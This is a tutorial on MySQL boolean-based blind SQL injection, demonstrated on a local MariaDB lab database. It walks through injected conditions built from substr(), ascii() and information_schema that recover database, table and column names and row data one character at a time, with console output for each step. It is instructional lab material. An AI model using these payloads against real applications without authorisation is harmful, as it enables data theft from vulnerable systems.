MySQL Boolean-Based Blind Injection

1. Functions commonly used in boolean-based injection

  • substr()

Purpose: extract part of a string.
Usage:
substr(str, start, length);
str is the string to cut from
start is the starting position; positions are 1-based, so the first character is position 1 (start = 0 returns an empty string)
length is the number of characters to return
substring() and mid() are synonyms of substr() in MySQL and can be swapped in when a filter blocks one of them.

MariaDB [security]> select substr('abc',1,1);
+-------------------+
| substr('abc',1,1) |
+-------------------+
| a                 |
+-------------------+
1 row in set (0.00 sec)

MariaDB [security]> select substr('abc',1,2);
+-------------------+
| substr('abc',1,2) |
+-------------------+
| ab                |
+-------------------+
1 row in set (0.00 sec)

MariaDB [security]> select substr('abc',2,1);
+-------------------+
| substr('abc',2,1) |
+-------------------+
| b                 |
+-------------------+
1 row in set (0.00 sec)
  • ascii()

Purpose: returns the numeric code of the leftmost character of the string str. If str is the empty string it returns 0; if str is NULL it returns NULL. ascii() works on single bytes; ord() gives the same answer for ASCII characters and also handles multi-byte characters.

MariaDB [security]> select ascii('');
+-----------+
| ascii('') |
+-----------+
|         0 |
+-----------+
1 row in set (0.00 sec)

MariaDB [security]> select ascii(NULL);
+-------------+
| ascii(NULL) |
+-------------+
|        NULL |
+-------------+
1 row in set (0.00 sec)

MariaDB [security]> select ascii('a');
+------------+
| ascii('a') |
+------------+
|         97 |
+------------+
1 row in set (0.00 sec)

  • char()

Purpose: converts a numeric code back to the character, the inverse of ascii().

MariaDB [security]> select char(97);
+----------+
| char(97) |
+----------+
| a        |
+----------+
1 row in set (0.00 sec)

2. Injection procedure

2.1 Guessing database names

  • Determine the number of databases
Note that information_schema.schemata only lists the schemas the application's database account has some privilege on, so this count reflects that account's view, not every database on the server.
MariaDB [security]> select * from users where id = 1 and (select count(schema_name) from information_schema.schemata) > 5;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select count(schema_name) from information_schema.schemata) > 6;
Empty set (0.00 sec)

MariaDB [security]> select count(schema_name) from information_schema.schemata;
+--------------------+
| count(schema_name) |
+--------------------+
|                  6 |
+--------------------+
1 row in set (0.00 sec)
  • Determine the length of each database name in turn

For example, to confirm that the first database name, information_schema, is 18 characters long:

MariaDB [security]> select * from users where id = 1 and (select length(schema_name) from information_schema.schemata limit 0,1) > 17 ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select length(schema_name) from information_schema.schemata limit 0,1) > 18 ;
Empty set (0.00 sec)

MariaDB [security]> select schema_name from information_schema.schemata limit 0,1;
+--------------------+
| schema_name        |
+--------------------+
| information_schema |
+--------------------+
1 row in set (0.00 sec)

  • Determine the ASCII code of the first character of the first database name
MariaDB [security]> select ascii('i');
+------------+
| ascii('i') |
+------------+
|        105 |
+------------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))) >104;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))) >105;
Empty set (0.00 sec)
  • Determine the ASCII code of the second character of the first database name
MariaDB [security]> select ascii('n');
+------------+
| ascii('n') |
+------------+
|        110 |
+------------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select ascii(substr((select schema_name from information_schema.schemata limit 0,1),2,1))) >109;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select ascii(substr((select schema_name from information_schema.schemata limit 0,1),2,1))) >110;
Empty set (0.00 sec)

  • Determine the length of the current database name
MariaDB [security]> select length(database());
+--------------------+
| length(database()) |
+--------------------+
|                  8 |
+--------------------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select length(database())) >7;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select length(database())) >8;
Empty set (0.00 sec)
  • Determine the ASCII code of the first character of the current database name
MariaDB [security]> select database();
+------------+
| database() |
+------------+
| security   |
+------------+
1 row in set (0.00 sec)

MariaDB [security]> select ascii('s');
+------------+
| ascii('s') |
+------------+
|        115 |
+------------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select ascii(substr((select database()),1,1))) >114;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select ascii(substr((select database()),1,1))) >115;
Empty set (0.00 sec)

2.2 Guessing table names

  • Determine the number of tables in the current database
MariaDB [security]> select count(table_name) from information_schema.tables where table_schema = database();
+-------------------+
| count(table_name) |
+-------------------+
|                 5 |
+-------------------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select count(table_name) from information_schema.tables where table_schema = database()) > 4;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select count(table_name) from information_schema.tables where table_schema = database()) > 5;
Empty set (0.00 sec)

  • Determine the length of the first table name in the current database
MariaDB [security]> select length(table_name) from information_schema.tables where table_schema = database() limit 0,1;
+--------------------+
| length(table_name) |
+--------------------+
|                  5 |
+--------------------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select length(table_name) from information_schema.tables where table_schema = database() limit 0,1) > 4;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select length(table_name) from information_schema.tables where table_schema = database() limit 0,1) > 5;
Empty set (0.00 sec)

  • Determine the ASCII code of the first character of the first table name in the current database
MariaDB [security]> select table_name from information_schema.tables where table_schema = database() limit 0,1;
+------------+
| table_name |
+------------+
| ceshi      |
+------------+
1 row in set (0.00 sec)

MariaDB [security]> select ascii('c');
+------------+
| ascii('c') |
+------------+
|         99 |
+------------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))) > 98;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))) > 99;
Empty set (0.01 sec)

2.3 Guessing column names

  • Determine the number of columns in the first table of the current database
MariaDB [security]> select count(column_name) from information_schema.columns where table_name = "ceshi" and table_schema = database();
+--------------------+
| count(column_name) |
+--------------------+
|                  2 |
+--------------------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select count(column_name) from information_schema.columns where table_name = "ceshi" and table_schema = database()) > 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select count(column_name) from information_schema.columns where table_name = "ceshi" and table_schema = database()) > 2;
Empty set (0.00 sec)
  • Determine the length of the first column name in the first table of the current database
MariaDB [security]> select length(column_name) from information_schema.columns where table_name = "ceshi" and table_schema = database() limit 0,1;
+---------------------+
| length(column_name) |
+---------------------+
|                   2 |
+---------------------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select length(column_name) from information_schema.columns where table_name = "ceshi" and table_schema = database() limit 0,1) > 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select length(column_name) from information_schema.columns where table_name = "ceshi" and table_schema = database() limit 0,1) > 2;
Empty set (0.00 sec)
  • Determine the ASCII code of the first character of the first column name in the first table of the current database
MariaDB [security]> select column_name from information_schema.columns where table_name = "ceshi" and table_schema = database() limit 0,1;
+-------------+
| column_name |
+-------------+
| id          |
+-------------+
1 row in set (0.00 sec)

MariaDB [security]> select ascii('i');
+------------+
| ascii('i') |
+------------+
|        105 |
+------------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select ascii(substr((select column_name from information_schema.columns where table_name = "ceshi" and table_schema = database() limit 0,1),1,1))) > 104;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select ascii(substr((select column_name from information_schema.columns where table_name = "ceshi" and table_schema = database() limit 0,1),1,1))) > 105;
Empty set (0.00 sec)

2.4 Guessing row contents

  • Determine the number of rows in the table
MariaDB [security]> select count(*) from ceshi;
+----------+
| count(*) |
+----------+
|        2 |
+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select count(*) from ceshi) > 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select count(*) from ceshi) > 2;
Empty set (0.00 sec)

  • Determine the length of the first row of data
The columns are joined into one string with concat_ws() so that a whole row can be extracted as a single value. concat_ws() skips NULL columns rather than returning NULL, which is why it is preferred over concat() here: one NULL column would otherwise blank out the entire row.
MariaDB [security]> select concat_ws("~",id,user) from ceshi limit 0,1;
+------------------------+
| concat_ws("~",id,user) |
+------------------------+
| 1~haha                 |
+------------------------+
1 row in set (0.00 sec)

MariaDB [security]> select length(concat_ws("~",id,user)) from ceshi limit 0,1;
+--------------------------------+
| length(concat_ws("~",id,user)) |
+--------------------------------+
|                              6 |
+--------------------------------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select length(concat_ws("~",id,user)) from ceshi limit 0,1) > 5;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select length(concat_ws("~",id,user)) from ceshi limit 0,1) > 6;
Empty set (0.00 sec)

  • Determine the ASCII code of the first character of the first row of data
MariaDB [security]> select concat_ws("~",id,user) from ceshi limit 0,1;
+------------------------+
| concat_ws("~",id,user) |
+------------------------+
| 1~haha                 |
+------------------------+
1 row in set (0.00 sec)

MariaDB [security]> select ascii('1');
+------------+
| ascii('1') |
+------------+
|         49 |
+------------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select ascii(substr((select concat_ws("~",id,user) from ceshi limit 0,1),1,1))) > 48;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and (select ascii(substr((select concat_ws("~",id,user) from ceshi limit 0,1),1,1))) > 49;
Empty set (0.01 sec)